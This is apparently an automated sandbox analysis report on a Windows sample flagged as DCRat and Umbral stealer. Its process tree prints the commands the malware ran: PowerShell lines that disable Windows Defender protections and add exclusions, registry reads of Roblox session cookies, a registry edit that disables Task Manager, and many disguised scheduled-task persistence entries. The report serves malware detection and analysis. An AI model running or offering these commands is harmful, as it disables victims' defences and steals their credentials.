Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240419-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    05-05-2024 01:28

General

  • Target

    a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe

  • Size

    4.3MB

  • MD5

    898a94f29edc228ce3bd2054f3d5d6dd

  • SHA1

    f2b5d32ca5520f35a738ef1ccbbf5fb2160bfbc5

  • SHA256

    a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37

  • SHA512

    8a7ee18864b118bd165b9f97aad3d188cd51985180feedf5c32c2f5acd6d427f05b7e6077a9c0c405bd152a203086203aa306db802e13f917c04040c4b789eae

  • SSDEEP

    49152:ENPuAcWILneTm53Oln3Gl1iy92HEs/sFZ583oMLmUZ8hXyaSvgIsR1SB:ENP0WILeTm5+l2lb40r5837L8iVvIvQ

Malware Config

Signatures

  • DcRat

    DarkCrystal (DCRat) is a .NET RAT, active since June 2019, that can load additional plugins.

  • Detect Umbral payload 3 IoCs
  • Process spawned unexpected child process 54 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • DCRat payload 4 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 18 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Executes dropped EXE 18 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and other session data.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 12 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 54 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Modifies registry class 17 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
    "C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3572
    • C:\Users\Admin\AppData\Local\Temp\stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2088
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1212
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
        3⤵
        • Views/modifies file attributes
        PID:4556
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4772
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:952
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1588
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3844
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        PID:3856
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        PID:2012
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1772
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        3⤵
        • Detects videocard installed
        PID:3676
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3680
        • C:\Windows\system32\PING.EXE
          ping localhost
          4⤵
          • Runs ping.exe
          PID:3916
    • C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
      "C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2876
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4128
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1072
          • C:\MsWinsessiondllNet\driverBrokercommon.exe
            "C:\MsWinsessiondllNet\driverBrokercommon.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Drops file in Windows directory
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3532
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SXVJApfGP5.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:5028
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                PID:3444
              • C:\Users\All Users\OfficeClickToRun.exe
                "C:\Users\All Users\OfficeClickToRun.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:4940
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4756ef43-838f-41ac-b2a9-a1e264a9db1d.vbs"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1496
                  • C:\Users\All Users\OfficeClickToRun.exe
                    "C:\Users\All Users\OfficeClickToRun.exe"
                    9⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Modifies registry class
                    • Suspicious use of WriteProcessMemory
                    PID:1684
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4ae9b577-2587-4e84-a33a-fd9cc54e5ee6.vbs"
                      10⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3968
                      • C:\Users\All Users\OfficeClickToRun.exe
                        "C:\Users\All Users\OfficeClickToRun.exe"
                        11⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Modifies registry class
                        • Suspicious use of WriteProcessMemory
                        PID:1156
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e7837ef9-14b2-4386-9ccd-3c775511e365.vbs"
                          12⤵
                          PID:4372
                          • C:\Users\All Users\OfficeClickToRun.exe
                            "C:\Users\All Users\OfficeClickToRun.exe"
                            13⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Modifies registry class
                            PID:2256
                            • C:\Windows\System32\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8b2c54eb-e0e1-4cf2-a59e-22e14481f541.vbs"
                              14⤵
                              PID:2532
                              • C:\Users\All Users\OfficeClickToRun.exe
                                "C:\Users\All Users\OfficeClickToRun.exe"
                                15⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Modifies registry class
                                PID:1112
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2c9836d-1c54-40a4-b2a2-595e2a692efd.vbs"
                                  16⤵
                                  PID:4968
                                  • C:\Users\All Users\OfficeClickToRun.exe
                                    "C:\Users\All Users\OfficeClickToRun.exe"
                                    17⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Modifies registry class
                                    PID:5016
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\79d8d831-89f9-4762-b1a4-f88f984104fa.vbs"
                                      18⤵
                                      PID:3596
                                      • C:\Users\All Users\OfficeClickToRun.exe
                                        "C:\Users\All Users\OfficeClickToRun.exe"
                                        19⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Modifies registry class
                                        PID:3008
                                        • C:\Windows\System32\WScript.exe
                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4bcc22c2-bfc5-4da7-b57a-f1d64750d21c.vbs"
                                          20⤵
                                          PID:2328
                                          • C:\Users\All Users\OfficeClickToRun.exe
                                            "C:\Users\All Users\OfficeClickToRun.exe"
                                            21⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Modifies registry class
                                            PID:2608
                                            • C:\Windows\System32\WScript.exe
                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2e3b6573-9956-4c08-a354-650a54e4b5fc.vbs"
                                              22⤵
                                              PID:2628
                                              • C:\Users\All Users\OfficeClickToRun.exe
                                                "C:\Users\All Users\OfficeClickToRun.exe"
                                                23⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • Modifies registry class
                                                PID:1480
                                                • C:\Windows\System32\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d5a02c96-5b4d-4eac-be2a-3b9ea31321b6.vbs"
                                                  24⤵
                                                  PID:3012
                                                  • C:\Users\All Users\OfficeClickToRun.exe
                                                    "C:\Users\All Users\OfficeClickToRun.exe"
                                                    25⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • Modifies registry class
                                                    PID:424
                                                    • C:\Windows\System32\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\77723675-b9f0-49d6-86aa-6fd4188fef6f.vbs"
                                                      26⤵
                                                      PID:3732
                                                      • C:\Users\All Users\OfficeClickToRun.exe
                                                        "C:\Users\All Users\OfficeClickToRun.exe"
                                                        27⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Modifies registry class
                                                        PID:3760
                                                        • C:\Windows\System32\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\58cd3153-e99f-4382-8f9d-20b7b99c045d.vbs"
                                                          28⤵
                                                          PID:2024
                                                          • C:\Users\All Users\OfficeClickToRun.exe
                                                            "C:\Users\All Users\OfficeClickToRun.exe"
                                                            29⤵
                                                            • Checks computer location settings
                                                            • Executes dropped EXE
                                                            • Modifies registry class
                                                            PID:648
                                                            • C:\Windows\System32\WScript.exe
                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a20377c5-42e8-47d2-8941-150cbd2a1243.vbs"
                                                              30⤵
                                                              PID:4780
                                                              • C:\Users\All Users\OfficeClickToRun.exe
                                                                "C:\Users\All Users\OfficeClickToRun.exe"
                                                                31⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                • Modifies registry class
                                                                PID:2168
                                                                • C:\Windows\System32\WScript.exe
                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\90768ac9-f677-4eca-bfa6-2c2289da3535.vbs"
                                                                  32⤵
                                                                  PID:2644
                                                                  • C:\Users\All Users\OfficeClickToRun.exe
                                                                    "C:\Users\All Users\OfficeClickToRun.exe"
                                                                    33⤵
                                                                    • Checks computer location settings
                                                                    • Executes dropped EXE
                                                                    • Modifies registry class
                                                                    PID:1676
                                                                    • C:\Windows\System32\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4fb73f37-69ab-4c36-839e-63fba0405246.vbs"
                                                                      34⤵
                                                                      PID:700
                                                                    • C:\Windows\System32\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\964d59a8-da7c-427a-9df7-83d092a74dec.vbs"
                                                                      34⤵
                                                                      PID:3732
                                                                • C:\Windows\System32\WScript.exe
                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6b3188dd-0e79-4205-9c12-221b928853cf.vbs"
                                                                  32⤵
                                                                  PID:4332
                                                            • C:\Windows\System32\WScript.exe
                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9631333a-2d67-4b6c-ab49-1152cf25e131.vbs"
                                                              30⤵
                                                              PID:1260
                                                        • C:\Windows\System32\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23970f29-63ea-4a42-89d3-82a0294c6654.vbs"
                                                          28⤵
                                                          PID:2604
                                                    • C:\Windows\System32\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\65e39de4-b06e-47c9-a366-406fdb705992.vbs"
                                                      26⤵
                                                      PID:1912
                                                • C:\Windows\System32\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\52c39398-c77a-4017-b39e-c4305685083f.vbs"
                                                  24⤵
                                                  PID:3572
                                            • C:\Windows\System32\WScript.exe
                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\247a55d3-4a2a-4013-90a7-551e0dba8375.vbs"
                                              22⤵
                                              PID:1072
                                        • C:\Windows\System32\WScript.exe
                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a46ec459-c490-4bc4-95f6-b2f98b27fed0.vbs"
                                          20⤵
                                          PID:1600
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92b637a2-a0f8-4de9-8f88-3395212ea9ff.vbs"
                                      18⤵
                                      PID:3908
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9553ac34-d8bb-4793-9745-28b9055e89ec.vbs"
                                  16⤵
                                  PID:2680
                            • C:\Windows\System32\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9845c9f8-f68f-44c0-8a0f-ab509582ad2d.vbs"
                              14⤵
                              PID:4436
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1fd5334d-3292-4a4f-ba80-ecac0649ffbc.vbs"
                          12⤵
                          PID:2876
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cc73393a-21db-4920-aef5-89bb6e511a85.vbs"
                      10⤵
                      PID:2380
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\201d0dd0-dd34-4a80-b983-499984a1af49.vbs"
                  8⤵
                  PID:4132
          • C:\Windows\SysWOW64\reg.exe
            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            5⤵
            • Modifies registry key
            PID:5064
    • C:\Users\Admin\AppData\Local\Temp\Inject.exe
      "C:\Users\Admin\AppData\Local\Temp\Inject.exe"
      2⤵
      • Executes dropped EXE
      PID:4460
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\MsWinsessiondllNet\conhost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1000
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1168
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\MsWinsessiondllNet\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2832
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1280
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2924
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:1684
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:1440
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:1436
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4968
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2044
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:408
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4580
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:424
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:5064
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3444
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:404
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4768
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3512
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2084
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4604
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2292
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:64
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4564
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4740
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3540
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2488
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4596
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2876
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3012
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4316
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4452
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3868
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4720
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4404
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3308
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:2388
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Windows\INF\winlogon.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:3856
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\INF\winlogon.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:4620
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Windows\INF\winlogon.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Creates scheduled task(s)
                                                              PID:1760
                                                            • C:\Windows\system32\schtasks.exe
